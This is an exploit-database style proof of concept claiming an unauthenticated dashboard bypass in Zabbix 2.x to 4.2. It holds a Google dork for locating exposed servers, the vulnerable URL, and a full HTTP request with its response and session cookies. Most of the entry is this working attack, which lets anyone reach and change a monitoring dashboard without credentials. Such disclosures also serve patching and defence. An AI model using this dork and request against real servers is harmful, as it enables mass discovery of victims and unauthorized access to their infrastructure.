# Exploit Title: Zabbix 4.2 - Authentication Bypass # Date: 2019-10-06 # Exploit Author: Milad Khoshdel # Software Link: https://www.zabbix.com/download # Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2 # Tested on: Linux Apache/2 PHP/7.2 # Google Dork: inurl:zabbix/zabbix.php ========= Vulnerable Page: ========= /zabbix.php?action=dashboard.view&dashboardid=1 ========= POC: ========= Attacker can bypass login page and access to dashboard page and create [Dashboard/Report/Screen/Map] without any Username/Password and anonymously. All Created elements [Dashboard/Report/Screen/Map] is accessible by other users and admin. REGUEST --> GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1 Host: [HOST-IP] Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close RESPONSE --> HTTP/1.1 200 OK Date: Sun, 06 Oct 2019 11:40:18 GMT Server: Apache/2.4.29 (Ubuntu) Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Content-Length: 19239 Connection: close Content-Type: text/html; charset=UTF-8 [Dashboard Page Content Will Load Here]